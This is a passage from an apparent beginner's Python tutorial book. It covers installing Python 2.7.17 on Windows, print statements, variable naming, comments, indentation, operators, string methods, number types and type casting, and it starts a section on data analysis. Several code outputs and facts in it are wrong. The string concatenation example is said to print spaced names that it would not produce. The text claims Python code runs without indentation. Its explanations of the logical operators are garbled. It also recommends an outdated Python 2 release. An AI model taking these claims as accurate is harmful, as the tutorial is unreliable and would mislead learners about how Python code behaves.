separately as well as a mutable [bytearray] type which
was mostly corresponding; both of which indicate
several arrays of bytes.
6. Taking out the backward-compatibility features such as
implicit relative imports, old-style classes, and string
exceptions.
7. Changing the mode of integer division functionality.
For instance, in the Python 2.x series, 5/2 equals 2.
Note that in the 3.x series, 5/2 equals 2.5. From the
recent versions of the 2.x series beginning from version
2.2 up until python 3: 5//2 equals 2.
In contemporary times, version releases in the version 3.x series
have all been equipped with added, substantial new features; and
every ongoing development on Python is being done in line with
the 3.x series.
C. HOW TO DOWNLOAD AND INSTALL PYTHON
In this time and age, being techy is a demand of the times, and the
lack of knowledge, classifies one as an outback. This can result to
being left out from the career world, especially in the field of
programming.
Numerous big shot companies have employed their own
programmers for purposes of branding, and to cut back on IT
expenses.
In the world of programming, using Python language is found to be
easier and programmer-friendly, thus, the universal use.
Discussed below are information on how to download python for
MS Windows. In this particular demo, we have chosen windows
because it’s the most common worldwide – even in not so
progressive countries. We want to cater to the programming needs
of everyone all over the globe.
Python 2.7.17 version was selected because this version bridges the
gap between the old version 2 and the new version 3.
Some of the updated functions/applications of version 3 are still not
compatible with some devices, so 2.7.17 is a smart choice.
Steps in downloading Python 2.7.17, and installing it on
Windows

1. Type python on your browser and press the Search


button to display the search results.
Scroll down to find the item you are interested in. In this instance,
you are looking for python. click “python releases for windows”,
and a new page opens. See image below:
2. Select the Python version, python 2.7.17, and click, or
you can select the version that is compatible to your
device or OS.
3. The new page contains the various python types. Scroll
down and select an option: in this instance, select
Windows x86 MSI installer and click.
4. Press the Python box at the bottom of your screen.
Click the “Run” button, and wait for the new window to
appear.

5. Select the user options that you require and press


“NEXT”.
Your screen will display the hard drive where your python will
be located.

6. Press the “NEXT” button.


7. Press yes, and wait for a few minutes. Sometimes it
can take longer for the application to download,
depending on the speed of your internet.
8. After that, click the FINISHED button to signify that
the installation has been completed
Your python has been installed in your computer and is now ready
to use. Find it in drive C, or wherever you have saved it.
There can be glitches along the way, but there are options which
are presented in this article. If you follow it well, there is no reason
that you cannot perform this task.
It’s important to note that there’s no need to compile programs.
Python is an interpretive language and can execute quickly your
commands.
You can also download directly from the Python website, by
selecting any of these versions – 3.8.1 or 2.7.17. and clicking
‘download.’

See image below:


Follow the step by step instructions prompted by the program itself.
Save and run the program in your computer.
For Mac
To download Python on Mac, you can follow a similar procedure,
but this time, you will have to access the “Python.mpkg” file, to
run the installer.
For Linux
For Linux, Python 2 and 3 may have been installed by default.
Hence, check first your operating system. You can check if your
device has already a Python program, by accessing your command
prompt and entering this: python—version, or python3—version.
If Python is not installed in your Linux, the result “command not
found” will be displayed. You may want to download both Python
2.7.17 and any of the versions of Python 3 for your Linux. This is
due to the fact that Linux can have more compatibility with Python
3.
For windows users, now that you have downloaded the program,
you’re ready to start.
And yes, congratulations! You can now begin working and having
fun with your Python programming system.
Writing The First Python Program
Beginners may find it difficult to start using Python. It’s a given
and nothing’s wrong about that. However, your desire to learn will
make it easier for you to gradually become familiar with the
language.
Here are the specific steps you can follow to start using Python.
Steps in using Python
Step #1–Read all about Python.
Python has included a README information in your downloaded
version. It’s advisable to read it first, so you will learn more about
the program.
You can start using your Python through the command box (black
box), or you can go to your saved file and read first the README
file by clicking it.
See image below:

This box will appear.


You can read the content completely, if you want to understand
more what the program is all about, the file-setup, and similar
information.
This is a long data that informs you of how to navigate and use
Python. Also, Python welcomes new contributions for its further
development.
You can copy paste the content of the box into a Window
document for better presentation.
If you don’t want to know all the other information about Python
and you’re raring to go, you can follow these next steps.
Step #2–Start using Python.
First open the Python file you have saved in your computer.
Click on Python as show below. In some versions, you just click
‘python’for the shell to appear.

See image below:


You can start using Python by utilizing the simplest function,
which is ‘print’. It’ s the simplest statement or directive of
python. It prints a line or string that you specify.
For Python 2, print command may or may not be enclosed in
parenthesis or brackets, while in Python 3 you have to enclose print
with brackets.
Example for Python 2:
print “Welcome to My Corner.”
Example for Python 3:
print (“Welcome to My Corner”)

The image below shows what appears when you press ‘enter’.
You may opt to use a Python shell through idle. If you do, this is
how it would appear:

In the Python 3.5.2 version, the text colors are: function (purple),
string (green) and the result (blue). (The string is composed of the
words inside the bracket (“Welcome to My Corner”), while the
function is the command word outside the bracket (print).
Take note that the image above is from the Python 2.7.12 version.
You have to use indentation for your Python statements/codes. The
standard Python code uses four spaces. The indentations are used in
place of braces or blocks.
In some programming languages, you usually use semi-colons at
the end of the commands–in python, you don’t need to add semi-
colons at the end of the whole statement.
In Python, semi-colons are used in separating variables inside the
brackets.
For version 3, click on your downloaded Python program and save
the file in your computer. Then Click on IDLE (Integrated
DeveLopment Environment), your shell will appear. You can now
start using your Python. It’s preferable to use idle, so that your
codes can be interpreted directly by idle.
Alternative method to open a shell (for some versions).
An alternative method to use your Python is to open a shell through
the following steps:
Step #1– Open your menu.
After downloading and saving your Python program in your
computer, open your menu and find your saved Python file. You
may find it in the downloaded files of your computer or in the files
where you saved it.
Step #2–Access your Python file.
Open your saved Python file (Python 27) by double clicking it. The
contents of Python 27 will appear. Instead of clicking on Python
directly (as shown above), click on Lib instead.

See image below.


This will appear:

Step #3–Click on ‘idlelib’.

Clicking the ‘idlelib’ will show this content:


Step #4–Click on idle to show the Python shell.
When you click on any of the ‘idle’ displayed on the menu, the
‘white’ shell will be displayed, as shown below:

The differences between the three ‘idle’ menu, is that the first two
‘idle’ commands have the black box (shell) too, while the last ‘idle’
has only the ‘white’ box (shell). I prefer the third ‘idle’ because it’
s easy to use.

Step #5–Start using your Python shell.


You can now start typing Python functions, using the shell above.
You may have noticed that there are various entries to the contents
of each of the files that you have opened. You can click and open
all of them, as you progress in learning more about your Python
programming.
Python is a programming language that has been studied by
students for several days or months. Thus, what’ s presented in this
book are the basics for beginners.
The rest of illustrations will assume you are running the python
programs in a Windows environment.

1. Start IDLE
2. Navigate to the File menu and click New Window
3. Type the following: print (“Hello World!”)
4. On the file, menu click Save. Type the name of
myProgram1.py
5. Navigate to Run and click Run Module to run the
program.
The first program that we have written is known as the “Hello
World!” and is used to not only provide an introduction to a new
computer coding language but also test the basic configuration of
the IDE. The output of the program is “Hello World!” Here is what
has happened, the Print() is an inbuilt function, it is prewritten and
preloaded for you, is used to display whatever is contained in the ()
as long as it is between the double quotes. The computer will
display anything written within the double quotes.
Practice Exercise: Now write and run the following python
programs:
✓ print(“I am now a Python Language Coder!”)
✓ print(“This is my second simple program!”)
✓ print(“I love the simplicity of Python”)
✓ print(“I will display whatever is here in quotes such as
owyhen2589gdbnz082”)
Now we need to write a program with numbers but before writing
such a program we need to learn something about Variables and
Types.
Remember python is object-oriented and it is not statically typed
which means we do not need to declare variables before using them
or specify their type. Let us explain this statement, an object-
oriented language simply means that the language supports viewing
and manipulating real-life scenarios as groups with subgroups that
can be linked and shared mimicking the natural order and
interaction of things. Not all programming languages are object
oriented, for instance, Visual C programming language is not
object-oriented. In programming, declaring variables means that we
explicitly state the nature of the variable. The variable can be
declared as an integer, long integer, short integer, floating integer, a
string, or as a character including if it is accessible locally or
globally. A variable is a storage location that changes values
depending on conditions.
For instance, number1 can take any number from 0 to infinity.
However, if we specify explicitly that int number1 it then means
that the storage location will only accept integers and not fractions
for instance. Fortunately or unfortunately, python does not require
us to explicitly state the nature of the storage location (declare
variables) as that is left to the python language itself to figure out
that.
Before tackling types of variables and rules of writing variables, let
us run a simple program to understand what variables when coding
a python program are.

✓ Start IDLE
✓ Navigate to the File menu and click New Window
✓ Type the following:
num1=4
num2=5
sum=num1+num2
print(sum)
✓ On the file, menu click Save. Type the name of
myProgram2.py
✓ Navigate to Run and click Run Module to run the program.
The expected output of this program should be “9” without the
double quotes.
Discussion
At this point, you are eager to understand what has just happened
and why the print(sum) does not have double quotes like the first
programs we wrote. Here is the explanation.
The first line num1=4 means that variable num1(our shortened way
of writing number1, first number) has been assigned 4 before the
program runs.
The second line num2=5 means that variable num2(our shortened
way of writing number2, second number) has been assigned 5
before the program runs.
The computer interprets these instructions and stores the numbers
given
The third line sum=num1+num2 tells the computer that takes
whatever num1 has been given and add to whatever num2 has been
given. In other terms, sum the values of num1 and num2.
The fourth line print(sum) means that display whatever sum has. If
we put double quotes to sum, the computer will simply display the
word sum and not the sum of the two numbers! Remember that
cliché that computers are garbage in and garbage out. They follow
what you give them!
Note: + is an operator for summing variables and has other uses.
Now let us try out three exercises involving numbers before we
explain types of variables and rules of writing variables so that you
get more freedom to play with variables. Remember variables
values vary for instance num1 can take 3, 8, 1562, 1.
Follow the steps of opening Python IDE and do the following:
✓ The output should be 54
num1=43
num2=11
sum=num1+num2
print(sum)
✓ The output should be 167
num1=101
num2=66
sum=num1+num2
print(sum)
✓ The output should be 28
num1=9
num2=19
sum=num1+num2
print(sum)

1. Variables
We have used num1, num2, and sum and the variable names were
not just random, they must follow certain rules and conventions.
Rules are what we cannot violate while conventions are much like
the recommended way. Let us start with the rules:
The Rules of When Naming Variables in Python

1. Variable names should always start with a letter or an


underscore, i.e.
num1
_num1

2. The remaining part of the variable name may consist of


numbers, letters, and underscores, i.e.
number1
num_be_r

3. Variable names are case sensitive meaning that capital


letters and non-capital letters are treated differently.
Num1 will be treated differently with num1.

Practice Exercise
Write/suggest five variables for:
✓ Hospital department.
✓ Bank.
✓ Media House.
Given scri=75, scr4=9, sscr2=13, Scr=18
✓ The variable names in above are supposed to represents
scores of students. Rewrite the variables to satisfy Python variable
rules and conventions.

2. Conventions When Naming Variables in Python


As earlier indicated, conventions are not rules per se are the
established traditions that add value and readability to the way we
name variables in Python.
❖ Uphold readability. Your variables should give a hint of
what they are handling because programs are meant to be read by
other people other than the person writing them.
number1 is easy to read compared to n1. Similarly, first_name is
easy to read compared to firstname or firstName or fn. The
implication of all these is that both are valid/acceptable variables in
python but the convention is forcing us to write them in an easy to
read form.
❖ Use descriptive names when writing your variables. For
instance, number1 as a variable name is descriptive compared yale
or mything. In other words, we can write yale to capture values for
number1 but the name does not outrightly hint what we are doing.
Remember when writing programs; assume another person will
maintain them. The person should be able to quickly figure out
what the program is all about before running it.
❖ Due to confusion, avoid using the uppercase ‘O’, lowercase
letter ‘l’ and the uppercase letter ‘I’ because they can be confused
with numbers. In other terms, using these letters will not be a
violation of writing variables but their inclusion as variable names
will breed confusion.
Practice Exercise 1
Re-write the following variable names to (1) be valid variable
names and follow (2) conventions of writing variable names.
✓ 23doctor
✓ line1
✓ Option3
✓ Mydesk
✓ #cup3
Practice Exercise 2
Write/Suggest variable names that are (1) valid and (2)
conventional.
✓ You want to sum three numbers.
✓ You want to store the names of four students.
✓ You want to store the names of five doctors in a hospital.

3. Keywords and Identifiers in Python Programming


Language
At this point, you have been wondering why you must use print and
str in that manner without the freedom or knowledge of why the
stated words have to be written in that manner. The words print and
str constitute a special type of words that have to be written that
way always. Each programming language has its set of keywords.
In most cases, some keywords are found across several
programming languages. Keywords are case sensitive in python
meaning that we have to type them in their lowercase form always.
Keywords cannot be used to name a function (we will explain what
it is later), name of a variable.
There are 33 keywords in Python and all are in lowercase save for
None, False, and True. They must always be written as they appear
below:
Note: The print() and str are functions, but they are
inbuilt/preloaded functions in Pythons. Functions are a set of rules
and methods that act when invoked. For instance, the print function
will display output when activated/invoked/called. At this point,
you have not encountered all of the keywords, but you will meet
them gradually. Take time to skim through, read and try to recall as
many as you can.
Practice Exercise
Identify what is wrong with the following variable names (The
exercise requires recalling what we have learned so far)
✓ for=1
✓ yield=3
✓ 34ball
✓ m

4. Comments and Statements


Statements in Python
A statement in Python refers to instructions that a Python
interpreter can work on/execute. An example is str=’I am a
Programmer’ and number1=3. A statement having an equal sign(=)
is known as an assignment statement. They are other types of
statements such as the if, while, and for which will be handled
later.
Practice Exercise
✓ Write a Python statement that assigns the first number a
value of 18.
✓ Write a programming statement that assigns the second
number value of 21.
✓ What type of statements are a. and b. above?

5. Multi-Line Python Statement


It is possible to spread a statement over multiple lines. Such a
statement is known as a multi-line statement. The termination of a
programming statement is denoted by new line character. To
spread a statement overs several lines, in Python, we use the
backslash (\) known as the line continuation character. An example
of a multi-line statement is:
sum=3+6+7+\
9+1+3+\
11+4+8
The example above is also known as an explicit line continuation.
In Python, the square brackets [] denotes line continuation similar
to parenthesis/round brackets (), and lastly braces {}.

The above example can be rewritten as


sum=(3+6+7+
9+1+3+
11+4+8)
Note: We have dropped the backslash(\) known as the line
continuation character when we use the parenthesis(round brackets)
because the parenthesis is doing the work that the line continuation
\ was doing.
Question: Why do you think multi-line statements are necessary we
can simply write a single line and the program statement will run
just fine?
Answer: Multi-line statements can help improve
formatting/readability of the entire program. Remember, when
writing a program always assume that it is other people who will
use and maintain it without your input.
Practice Exercise:
Rewrite the following program statements using multi-line
operators such as the \, [],() or {} to improve readability of the
program statements.

total=2+9+3+6+8+2+5+1+14+5+21+26+4+7+13+31+24
count=13+1+56+3+7+9+5+12+54+4+7+45+71+4+8+5
Semicolons are also used when creating multiple statements in a
single line. Assume we have to assign and display the age of four
employees in a python program. The program could be written as:
employee1=25; employee2=45; employee3=32; employee4=43.

6. Indentation in Python
Indentation is used for categorization program lines into a block in
Python. The amount of indentation to use in Python depends
entirely on the programmer. However, it is important to ensure
consistency. By convention, four whitespaces are used for
indentation instead of using tabs. For example:
Note: We will explain what kind of program of this is later.
Indentation in Python also helps make the program look neat and
clean. Indentation creates consistency. However, when performing
line continuation indentation can be ignored. Incorrect indentation
will create an indentation error. Correct python programs without
indentation will still run but they might be neat and consistent from
human readability view.

7. Comments in Pythons
When writing python programs and indeed any programming
language, comments are very important. Comments are used to
describe what is happening within a program. It becomes easier for
another person taking a look at a program to have an idea of what
the program does by reading the comments in it. Comments are
also useful to a programmer as one can forget the critical details of
a program written. The hash (#) symbol is used before writing a
comment in Python. The comment extends up to the newline
character. The python interpreter normally ignores comments.
Comments are meant for programmers to understand the program
better.
Example

Start IDLE
Navigate to the File menu and click New Window
Type the following:
#This is my first comment
#The program will print Hello World
Print(‘Hello World’) #This is an inbuilt function to
display

On the file, menu click Save. Type the name of


myProgram5.py
Navigate to Run and click Run Module to run the program
Practice Exercise
This exercise integrates most of what we have covered so far.
✓ Write a program to sum two numbers 45, and 12 and include
single line comments at each line of code.
✓ Write a program to show the names of two employees where
the first employee is “Daisy” and the second employee is
“Richard”. Include single comments at each line of code.
✓ Write a program to display the student registration numbers
where the student names and their registration are: Yvonne=235,
Ian=782, James=1235, Juliet=568.

Multi-Line Comments
Just like multi-line program statements we also have multi-line
comments. There are several ways of writing multi-line comments.
The first approach is to type the hash (#) at each comment line
starting point.

For Example
Start IDLE.
Navigate to the File menu and click New Window.
Type the following:
#I am going to write a long comment line
#the comment will spill over to this line
#and finally end here.
The second way of writing multi-line comments involves using
triple single or double quotes: ‘’’ or”””. For multi-line strings and
multi-line comments in Python, we use the triple quotes. Caution:
When used in docstrings they will generate extra code but we do
not have to worry about this at this instance.
Example:
Start IDLE.
Navigate to the File menu and click New Window.
Type the following:
“””This is also a great i
illustration of
a multi-line comment in Python”””

Summary
Variable are storage locations that a user specifies before writing
and running a python program. Variable names are labels of those
storage locations. A variable holds a value depending on
circumstances. For instance, doctor1 can be Daniel, Brenda or Rita.
Patient1 can be Luke, William or Kelly. Variable names are written
by adhering to rules and conventions. Rules are a must while
conventions are optional but recommended as they help write
readable variable names. When writing a program, you should
assume that another person will examine or run it without your
input and thus should be well written. In programming, declaring
variables means that we explicitly state the nature of the variable.
The variable can be declared as an integer, long integer, short
integer, floating integer, a string, or as a character including if it is
accessible locally or globally. A variable is a storage location that
changes values depending on conditions. Use descriptive names
when writing your variables.
The Python Operators

While we are here, we want to look at the topic of the Python


operators and what these are able to do for some of our codings. As
we go through some of the codings that need to be done as a
beginner throughout this guidebook, you will find that these
operators are pretty common and we are going to use them on a
regular basis. There are actually a number of operators, but we are
able to split them up into a few different types based on our needs.
Some of the different operators that we are able to work with will
include:

1. The arithmetic operators. These are the ones that will


allow you to complete some mathematical equations
inside of your code, such as addition or subtraction.
You can simply add together two operands in the code,
or two parts of the code together, subtract them,
multiply them, and divide them and work from there.
These can be used in many of the different codes that
you would want to write along the way. Some of the
options that you will be able to use when it comes to
the arithmetic operators will include:

1. (+): this is the addition operator and it is responsible


for adding together both of your values.

2. (-): this is the subtraction operator and it is going to be


responsible for taking the right operand and subtracting
it from the left.

3. (*): this is the multiplication operator and it is used to


multiply two or more values in the equation.

4. (/): this is the division operator and it is going to divide


the value of the left operand from that on the right and
gives you the answer.

2. Comparison operators: We are also able to work with


the comparison operators. These are going to be a good
option when we would like to take two or more parts of
the code, such as the statements or the values, and then
compare them with one another. This one is going to
rely on the Boolean expressions to help us get things
done because it will allow us to look at true or false
answers along the way. so, the statements that you are
comparing will either be true or they will be false
based on how they compare.

1. (>=): this one means to check if the operand on the left


is greater than or equal to the value of the one on the
right.
2. (<=): this one means to check if the value of the
operand on the left side is less than or the same/equal
to the one on the right.

3. (>): this one means to check whether the values of the


left side are greater than the value on the right side of
the code.

4. (<): this one means to check whether the values of the


left side are less than the values that are on the right
side.

5. (!=): this is not equal to operator.

6. (==): this one is equal to operator.

3. The logical operators: The next option is going to be


the logical operators. These ones are often not used
until we get to some of the more advanced codes that
you may write later. These types of operators are going
to be the ones that we will need to use to evaluate the
input that a user is able to give to you with any of the
conditions that you decide to set in the code, and there
are three of them that can be used to help us with this
goal.

1. Or: with this one, the compiler is going to evaluate x


and if false, it will then go over and evaluate y. If x
ends up being true, the compiler is going to return the
evaluation of x.

2. And: if x ends up being the one that is false, the


compiler is going to evaluate it. If x ends up being true,
it will move on and evaluate y.

3. Not: it ends up being false, the compiler is going to


return True. But if x ends up being true, the program
will return false.

4. Assignment operators: And finally, we are going to


take a look at the assignment operators. These are
going to be ones that are used all of the time, and we
have actually already seen them in some coding. The
assignment operator is simply going to be an equal sign
because it takes a value and assigns it over to one of
your variables. You can use any variable or value that
you want here, and do the assigning s much as you
would like, just make sure that the equal sign is in the
right place.
These operators are going to be important to the codes that you
write for many reasons, and it often depends on what you are
hoping to accomplish out of some of the codes that you are writing
along the way. Take some time to look these over and learn a bit
more about these operators and how you are able to use them in
some of your own codings along the way for the best results.
Basic Data Types in Python
What is Data Types?
We know that variables are used to store the data we use in our
Python programs. But, how do these variables actually work?
Each system has a Random-Access Memory (RAM), which is used
to store temporary data. When we declare a variable as such:
x = 10
What happens in the back is that Python reserves a small segment
of our RAM for us and it is used to store that value.
But, how does the Python interpreter decide how much space to
allocate for our variable? This allocation of space is dependent on
the size of the variable, which in turn, is dependent on the data type
of the variable.
To make our program more efficient and faster, we need to assign
memory carefully and use the right data types for our variables.
Booleans
One of the simplest data types in Python and other programming
languages is the bool or the Boolean data type.
A Boolean variable can only have two possible values; True or
False. Such variables are used commonly to test for conditions.
For example, if you wish to know the state of the web server on in
your Python program, you could write something like:

1. webServerOpen = True
2. lockdownState = False
3. underMaintenance = False
If you are unsure about the data type of a variable, Python allows
you to easily access the data type using the type() function.
If you run the following code next,

1. print(type(webServerOpen))
2. print(type(lockdownState))
You will get the following output:

The function returns the data type of the variable which is sent
inside its parenthesis. The values inside the parenthesis are called
arguments. Here, ‘bool’ represents a Boolean variable.
Strings
Remember, in our first program, when we printed “Hello World!”.
We called it a phrase or text which is not built into Python but can
be used to convey messages from the user. This text or similar
phrases are called Strings in programming languages.
Strings are nothing more than a series of characters. Whenever you
see something enclosed with double quotation marks or single
quotation marks, the text inside is considered a string.
For example, these two variables that I’ve just declared are both
Strings and perfectly valid.

1. a = "This is an example of a string and I’m using


double quotation marks"
2. b = 'This is also an example of strings and now, I am
using single quotation marks'
What does this flexibility offer? If you take a look at the variable
‘a’. I’ve used a contraction and a single quotation mark inside my
string (which uses a double quotation mark).
Here are a few examples of quotes and sentences where I’ve used
contractions:

1. string1 = "I'm an amazing person"


2. string2 = 'I told him, "Work hard!"'
String Methods
Methods are simple actions that we can ask the Python interpreter
to take for us. Methods require variables or a piece of data on
which they can work and produce the desired result. Let’s first
write some code and we’ll explore it as we go.
Changing the Case of Strings:
Create a new file called stringMethods.py (or alternatively use
IDLE) and run the following code:

1. username = 'john doe'


2. print(username.title())
If you run the code, you should get this output:
John Doe
In the first line, we declare our variable and assign a string to it. In
the second line, we start by printing something. In the parenthesis
of the print function, we use the method title() on our variable.
Methods let us perform an action on our data. In this case, the title
method displays each word of our variable in capital letters. Since
the method acts on our variable, we connect the variable to the
method using a period or ‘.’ symbol.
Methods are identified by the set of parentheses and take in
additional information to act on the variables they are connected to.
Since the title method doesn’t need any other information, the
parenthesis is empty.
To deal with character casing, several other methods are available.
Let’s test the upper() and lower() method by adding the following
code to your file. Then, run it:
username2 = 'John Doe'
print(username.upper())
print(username.lower())
The output of these methods should be:
JOHN DOE
john doe
So, the upper method capitalizes each word, whereas, the lower
method converts all characters to lowercase letters.
Concatenating and Combining Strings:
At times your program might require users to input their first name,
middle name, and then the last name. But, when you display it
back, these names are combined together.
So, how do we concatenate strings? It’ s simple. The “+” symbol is
called the concatenation operator and is used to combine strings
together.

Take a look at the following code:

1. firstName = "John"
2. middleName = "Adam"
3. lastName = "Doe"
4. fullName = firstName + middleName + lastName
5. print(fullName)
What’s the output? John Adam Doe
If you want to run some other methods on the output, feel free.
Here’s a program which runs some tests on the variables:
firstName = "John"
middleName = "Adam"
lastName = "Doe"
fullName = firstName + middleName + lastName
print(fullName.lower())
message = "The manager, " + fullName.title() + ", is a good
person."
What would be the output? For the first print statement:
john adam doe – All lowercase letters. For the second print
statement:
The manager, John Adam Doe, is a good person. – Concatenated
a string on which a method was applied.
So, you can use these methods on every string in your program and
it will output just fine.

Adding Whitespaces:
Whitespaces refer to the characters which are used to produce
spacing in between words, characters, or sentences using tabs,
spaces, and line breaks. It’s better to use properly use whitespaces
so the outputs are readable for users.
To produce whitespaces using tabs, use this combination of
characters ‘\t’. Here’s an example to show you the difference with
and without the tab spacing.

1. print("This is without a tab spacing!")


2. print("\t This is with a tab spacing!")
Notice the difference in the output? Here’s the output of the two
lines above.
This is without a tab spacing
This is with a tab spacing
To add new text to new lines, you can add a line break using the
combination ‘\n’. Here’s an example to show you the difference a
line break adds:

1. print('I love the following weathers: SummerWinter')


2. print('I love the following
weathers:\nSummer\nWinter')
Once again, which output is more readable? Take a look at the
outputs.

1. I love the following weathers: SummerWinter


2. I love the following weathers:
Summer
Winter
You can use both tabs, spaces, and newlines together and it would
work just fine. Here's an example program to cater to both new
lines and tabs being used together.
print(“I love these weathers:\n\tSummer\n\tWinter”)
Here’s the output of the command:
I love these weathers:
Summer
Winter
Removing or Stripping the Whitespace:
To you, the phrases ‘code’ and ‘code’ look the same right? To the
computer, however, they are two very different strings. It treats this
extra space as the part of the string; until, told otherwise.
Where does this produce a problem? When you are about to
compare two strings to check if ‘code’ and ‘code ’
are equal, you will think it’s True, but the interpreter will always
return a False.
If you think your string has extra space to the right side of the
string, use the rstrip() method. Let’s take a look at an example. I’ll
declare a variable, show you the whitespace, and then remove it to
see the difference. Here’s the code:
favoriteWeather = "Summer "
print(favoriteWeather + "is lovely")
favoriteWeather.rstrip()
print(favoriteWeather + "is lovely")
If you run these statements, you might expect the following output:
Summeris lovely
Summer is lovely

Did you expect this output? Here’ s the actual output:


Summeris lovely
Summeris lovely
This is because the effect of rstrip() is temporary. Sure, it does
cause the removal of whitespaces, but, to ensure it is permanent.
You need to reassign it to the original variable. Here’s the same
example, continued to explain this concept:
favoriteWeather = "Summer "
print(favoriteWeather + " is lovely")
favoriteWeather = favoriteWeather.rstrip()
print(favoriteWeather + " is lovely")
In line 3, rather than using the method only, I assigned it to the
original variable which causes the permanent removal of
whitespaces. Here’s the new output:
Summeris lovely
Summer is lovely – After the removal of spaces
If you think your string has extra space to the left side of the string,
use the lstrip() method. Here’s a small program to test the lstrip()
method:
weather = " cold"
print("It is " + weather)
weather = weather.lstrip()
print("It is " + weather)
Here’s the output of the lines:
It is cold
It is cold
If you wish to remove whitespaces from both ends, use the strip()
method. Here’s an example to show you the removal of
whitespaces from both ends:
message = " It's so cold in London "
print(message)
message = message.strip()
print(message)
Here’s the output of these statements:
It’s so cold in London(end)
It’s so cold in London (end)
If you want to temporarily notice the effects of strip, you can use
the method in a print function and see the effects. These strip
methods are extremely useful in real-life applications when user
data has to be cleaned and manipulated.
Numbers
Numbers are an integral part of our daily lives and computers make
use of the two binary digits; 0 and 1, a lot. Python has several
different ways to treat numbers. Here are a few common types
we’ll be looking at:
Integers
Integers are numbers that are written without fractional parts. In
Python, these numbers have the type int (just like bool for
Booleans).
Here are a few integers and their declaration in Python:

a = 2424
b = 10101
c = 9040
Floats
If you declare a number with a decimal point, Python will
automatically consider it a floating-point number or a float.
All operations you could perform on integers, they can also be
performed on floating point numbers. If you run the type function
on floats, you’ ll get a type ‘float’.
Here’s a program to show some operations on floats:
w = 1.2 * 0.3
print(w)
x = 10.4 + 1.6
print(x)
y = 10.555 + 22.224
print(y)
z = 0.004 + 0.006
print(z)
Here is the output to all four print statements:
0.36
12.0
32.778999999999996
0.01
Type Casting: What Is It?
Another fact about Python is that it is a dynamically-typed
language.
A weakly-typed or dynamically-typed language doesn’t associate a
data type with your variable at the time you are typing your code.
Rather, the type is associated with the variable at run-time Not
clear? Let’s see an example.
x = 10
x = "I am just a phrase"
x = 10.444
x = True
When you run this code, it’ll perform its desired actions correctly.
Let’s see what happens with the variable ‘x’ though. We’ve written
four statements and assigned different values to ‘x’.
On run-time (when you interpret or run your program), on line 1,
‘x’ is an integer. On line 2, it’s a string. On line 3, it’s a float, and
finally, it’s a Boolean value.
However, through typecasting, we can manually change the types
of each variable. The functions we’ll be using for that purpose are
str(), int(), and float().
Let’s expand the same example:
x = 10
x = float(x)
print(type(x))
x = "I am just a phrase"
print("x: " + x)
print(type(x))
x = 10.444
x = int(x)
print(type(x))
x = False
x = int(x)
print(x)
In this program, we’ve used everything covered in the last few
lessons. All data types and converted them using our newly learned
function.
In the first case, x is converted into a float and the type function
does verify that for us. Secondly, the string is still a string since it
can’t be converted into numbers, int or float. Thirdly, we convert
the float into an integer.
As an added exercise, if you print the newly changed value of the
third case, you’ll see that the value of x is: 10. This is because the
type is now changed and the values after the decimal point are
discarded.
In the fourth case, we print the value of x which is False. Then, we
change its value to an integer. Here, something else comes up. The
output? 0.
It’s because, in Python, the value of True is usually any non-zero
number (typically 1) and for False, it’s 0. So, their integer
conversions yield 1 and 0 for True and False respectively.
Comments
Comments are text phrases that are put in the code to make it
understandable and readable for other coders, readers, and
programmers.
Why Are Comments Important?
Comments are very important, especially when you’re working
with other programmers and they’ll be reviewing your code sooner
or later. Through comments, you can write a small description of
the code and tell them what it does.
Also, if you have other details or personal messages which are
relevant to the code, you can put them there, since the interpreter
doesn’t catch them.
How to Write Comments?
In python, there are two ways to write comments, and we’ll be
exploring both of them. For our first method, you can use the “#”
symbol in front of the line you wish to comment. Here, take a look
at this code:
# This line is a comment
# Count is a simple variable
count = 15
print(count)
If you run this code, the output will be 15. This is because the
comments lines (starting with #) are not run at all.
Now, this method is fine if your commented lines are less i.e. do
not span over multiple lines. But, if they do, hashing all of them is
a waste of time. For our second comment, we’ll enclose our
commented lines is three single quotation marks (‘’’) and close
it with three quotation marks as well. Here’s an example:

1. '''
2. This comment spans
3. on multiple lines.
4. '''
5. count = 15
6. print(count)
Notice, we have to close our multi-line comment, unlike the single
line comment.
Data Analysis with Python

Another topic that we need to explore a bit here is how Python, and
some of the libraries that come with it, can work with the process
of data analysis. This is an important process for any businesses
because it allows them to take all of the data and information they
have been collecting for a long time, and then can put it to good use
once they understand what has been said within the information. It
can be hard for a person to go through all of this information and
figure out what is there, but for a data analyst who is able to use
Python to complete the process, it is easy to find the information
and the trends that you need.

The first thing that we need to look at here though is what data
analysis is all about. Data analysis is going to be the process that
companies can use in order to extract out useful, relevant, and even
meaningful information from the data they collect, in a manner that
is systematic. This ensures that they are able to get the full
information out of everything and see some great results in the
process. There are a number of reasons that a company would
choose to work on their own data analysis, and this can include:

1. Parameter estimation, which helps them to infer some


of the unknowns that they are dealing with.
2. Model development and prediction. This is going to be
a lot of forecasting in the mix.
3. Feature extraction which means that we are going to
identify some of the patterns that are there.
4. Hypothesis testing. This is going to allow us to verify
the information and trends that we have found.
5. Fault detection. This is going to be the monitoring of
the process that you are working on to make sure that
there aren’t any biases that happen in the information.

One thing that we need to make sure that we are watching out for is
the idea of bias in the information that we have. If you go into the
data analysis with the idea that something should turn out a certain
way, or that you are going to manipulate the data so it fits the ideas
that you have, there are going to be some problems. You can
always change the data to say what you would like, but this doesn’t
mean that you are getting the true trends that come with this
information, and you may be missing out on some of the things that
you actually need to know about.
This is why a lot of data analysts will start this without any kind of
hypothesis at all. This allows them to see the actual trends that
come with this, and then see where the information is going to take
you, without any kind of slant with the information that you have.
This can make life easier and ensures that you are actually able to
see what is truly in the information, rather than what you would
like to see in that information.

Now, there are going to be a few different types of data that you
can work with. First, there is going to be the deterministic. This is
going to also be known as the data analysis that is non-random.
And then there is going to be the stochastic, which is pretty much
any kind that is not going to fit into the category of deterministic.

1. The Data Life Cycle

As we go through this information, it is important to understand


some of the different phases that come with the data life cycle.
Each of these comes together to ensure that we are able to
understand the information that is presented to us and that we are
able to use all of the data in the most efficient and best way
possible.

There are a few stages that are going to come with this data life
cycle, and we are going to start out with some of the basics to
discuss each one to help us see what we are able to do with the data
available to us. First, we work with data capture. The first
experience that an individual or a company should have with a data
item is to have it pass through the firewalls of the enterprise. This
is going to be known as the Data Capture, which is basically going
to be the act of creating values of data that do not exist yet and
have never actually existed in that enterprise either. There are three
ways that you can capture the data including:

1. Data acquisition: This is going to be the ingestion of


data that is already existing that was produced by the
organization but outside of the chosen enterprise.
2. Data entry: This is when we are dealing with the
creation of new data values to help with the enterprise
and it is done by devices or human operators that can
help to generate the data needed.
3. Signal reception: This is where we are going to capture
the data that a device has created with us, typically in
the control system, but can be found in the Internet of
